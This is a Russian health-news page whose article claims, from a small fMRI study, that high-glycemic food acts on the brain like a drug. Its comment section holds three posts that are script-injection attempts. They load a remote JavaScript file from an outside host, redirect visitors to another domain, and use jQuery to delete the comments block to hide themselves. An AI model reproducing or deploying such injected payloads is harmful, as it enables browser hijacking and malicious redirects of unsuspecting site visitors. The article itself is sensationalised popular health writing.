Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  МРТ подтвердило то, о чем...  >>  МРТ подтвердило то, о чем вы догадывались! Еда – это наркотик! Как его победить?
 
Обратная связь
 

МРТ подтвердило то, о чем вы догадывались! Еда – это наркотик! Как его победить?

Размер шрифта
06 августа 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Похудеть сложно! Отказаться от любимых пирожных, котлеток, картошечки – невозможно! И вы в этом не виноваты! Последние исследования показывают, что еда – это НАРКОТИК! Как его победить?

МРТ подтвердило то, о чем вы догадывались! Еда – это наркотик! Как его победить?

Одно из последних исследований свидетельствует о том, что некоторые продукты питания действуют также как наркотические вещества, вызывая самую настоящую зависимость.

В исследовании приняли участие двенадцать мужчин с избыточным весом или ожирением. Ученые исследовали их мозг с помощью функциональной магнитно-резонансной томографии в течение четырех часов после приема пищи. Этот промежуток времени является важнейшим с точки зрения формирования пищевого поведения во время следующего приема пищи.

Параллельно с МРТ ученые измеряли уровень глюкозы крови испытуемых и оценивали степень их голода.

При этом экспериментальный прием пищи было строго стандартизирован – все участники исследования получили питательный молочный коктейль с идентичной калорийностью и вкусовыми характеристиками. С одной лишь оговоркой: в половине коктейлей содержались «быстрые», легкоусвояемые углеводы (с высоким гликемическим индексом), тогда как в остальные коктейли были добавлены углеводы «медленные» (с низким гликемическим индексом).

Гликемический индекс – это показатель, характеризующий, скорость усвоения и расходования питательных веществ. Чем больше значение этого индекса – тем быстрее организм «сжигает» поглощенную пищу, тем больше мы хотим есть. За максимум принимают гликемический индекс глюкозы – 100.

«Быстрые» углеводы в большом количестве содержатся, например, в хлебобулочных изделиях из муки высшего сорта, кондитерских продуктах и белом рисе. «Медленные» углеводы можно найти в цельнозерновых продуктах и сладком картофеле.

Ученые обнаружили, что чрезмерное потребление углеводов с высоким гликемическим индексом пробуждает зверский аппетит посредством стимуляция определенных отделов мозга – тех же самых, которые задействуются при наркомании.

Авторы исследования убеждены, что их открытие имеет важное значения для дальнейшего усовершенствования методологии борьбы с ожирением.

«Давно известный постулат – чтобы похудеть, нужно ограничить потребление легкоусвояемых углеводов – впервые получил исчерпывающее физиологическое объяснение», – утверждает доктор Дэвид Людвиг, директор института ожирения Бостонской Педиатрической клиники.

Зная, что еда это наркотик, вы сможете по-другому отнестись к своей проблеме и победить ее!

А начать можете с нашего специального проекта «Сбрось лишнее». Там вы найдете все о том, как похудеть!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:08

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:29

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:08

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Лишние килограммы изменяют вкус еды   В новый год – с новым весом!   Сколько надо сбросить, чтобы не заболеть раком! Ответ в конце статьи!   Как воспитывать ребенка, чтобы он не был толстым?  
05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная? 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 
28 июня 2013Хотите похудеть – пейте таблетки от эректильной дисфункции! 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 

Слайдшоу

1
Почему вы не можете похудеть? 5 причин. Часть 2
Как похудеть, ничего не делая
Как натренировать волю и похудеть?

Тесты

1
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.